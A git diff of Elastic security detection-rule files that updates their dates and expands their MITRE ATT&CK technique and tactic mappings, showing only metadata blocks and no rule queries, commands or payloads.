a/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml b/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml index b548ad93348..97c4cbd7997 100644 --- a/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml +++ b/rules/cross-platform/defense_evasion_masquerading_space_after_filename.toml @@ -2,7 +2,7 @@ creation_date = "2022/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,3 +106,21 @@ reference = "https://attack.mitre.org/techniques/T1036/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml index 31b65ceebca..136a5eee241 100644 --- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml +++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/30" integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,34 +96,40 @@ FROM logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml index c6e250f6b81..e2a495f937b 100644 --- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml +++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,31 @@ Virtual machine fingerprinting involves identifying virtualized environments by [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1497" +name = "Virtualization/Sandbox Evasion" +reference = "https://attack.mitre.org/techniques/T1497/" + +[[rule.threat.technique.subtechnique]] +id = "T1497.001" +name = "System Checks" +reference = "https://attack.mitre.org/techniques/T1497/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml index 2f85b8138b9..af00648718c 100644 --- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -172,3 +172,47 @@ reference = "https://attack.mitre.org/techniques/T1083/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml index 8ea0b32ead0..ad5487a6d5d 100644 --- a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml @@ -4,7 +4,7 @@ integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,3 +133,16 @@ framework = "MITRE ATT&CK" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml index 8934cb47811..59a2cdf4883 100644 --- a/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml +++ b/rules/cross-platform/execution_aws_ec2_lolbin_via_ssm.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/23" integration = ["aws", "endpoint"] maturity = "production" -updated_date = "2025/11/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -225,26 +225,36 @@ FROM logs-aws.cloudtrail*, logs-endpoint.events.process-* METADATA _id, _version [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml b/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml index bc38184ca9b..42fff8466dd 100644 --- a/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml +++ b/rules/cross-platform/execution_aws_ssm_sendcommand_with_command_parameters.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/03" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -145,17 +145,31 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [[rule.threat.technique]] id = "T1651" name = "Cloud Administration Command" reference = "https://attack.mitre.org/techniques/T1651/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml index 13d278cd24c..807903bc590 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -121,6 +121,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml index 211a1183c0f..25b20279397 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,6 +125,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml index 652be9cb05b..67741370170 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -145,6 +145,16 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique]] +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -153,6 +163,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml index 95229fe817d..fc91b794a16 100644 --- a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml +++ b/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml @@ -4,7 +4,7 @@ integration = ["cloud_defend", "kubernetes"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,6 +108,11 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" @@ -135,3 +140,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml index 0074a431b39..314d1926cab 100644 --- a/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml +++ b/rules/cross-platform/execution_git_exploit_cve_2025_48384.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/12" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/11/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -88,12 +88,35 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] - name = "Exploitation for Client Execution" - id = "T1203" - reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml index 13869c98f9b..22754b0113e 100644 --- a/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml +++ b/rules/cross-platform/execution_nodejs_pre_or_post_install_script_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,6 +83,11 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" @@ -123,3 +128,21 @@ framework = "MITRE ATT&CK" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_openclaw_agent_child_process.toml b/rules/cross-platform/execution_openclaw_agent_child_process.toml index 919bf598224..c2a5536ac48 100644 --- a/rules/cross-platform/execution_openclaw_agent_child_process.toml +++ b/rules/cross-platform/execution_openclaw_agent_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,36 +83,89 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml index 4a04cf04a54..9fecc9c12b1 100644 --- a/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml +++ b/rules/cross-platform/execution_privileged_container_creation_with_host_reference.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/27" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/11/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,11 @@ id = "T1609" name = "Container Administration Command" reference = "https://attack.mitre.org/techniques/T1609/" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/execution_register_github_actions_runner.toml index bd5c534de51..bd45fce941d 100644 --- a/rules/cross-platform/execution_register_github_actions_runner.toml +++ b/rules/cross-platform/execution_register_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,32 +95,44 @@ process where event.type == "start" and event.action in ("exec", "exec_event", " [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1219" +name = "Remote Access Tools" +reference = "https://attack.mitre.org/techniques/T1219/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/execution_revershell_via_shell_cmd.toml index 62a96f31eb4..2ddadb560c6 100644 --- a/rules/cross-platform/execution_revershell_via_shell_cmd.toml +++ b/rules/cross-platform/execution_revershell_via_shell_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,26 @@ process where event.type in ("start", "process_started") and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1095" +name = "Non-Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1095/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml index a9a731ace09..1028f94f30a 100644 --- a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml +++ b/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -67,24 +67,41 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml index ac4891f7ad4..d2189e589d5 100644 --- a/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml +++ b/rules/cross-platform/execution_sap_netweaver_webshell_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/04/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,24 +84,74 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml index 8ca0cdb5a1f..4cbccabc4c9 100644 --- a/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml +++ b/rules/cross-platform/execution_suspicious_java_netcon_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -109,24 +109,46 @@ Java Naming and Directory Interface (JNDI) is a Java API that provides naming an [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/execution_via_github_actions_runner.toml b/rules/cross-platform/execution_via_github_actions_runner.toml index 08782e87f48..c82405b97e9 100644 --- a/rules/cross-platform/execution_via_github_actions_runner.toml +++ b/rules/cross-platform/execution_via_github_actions_runner.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", 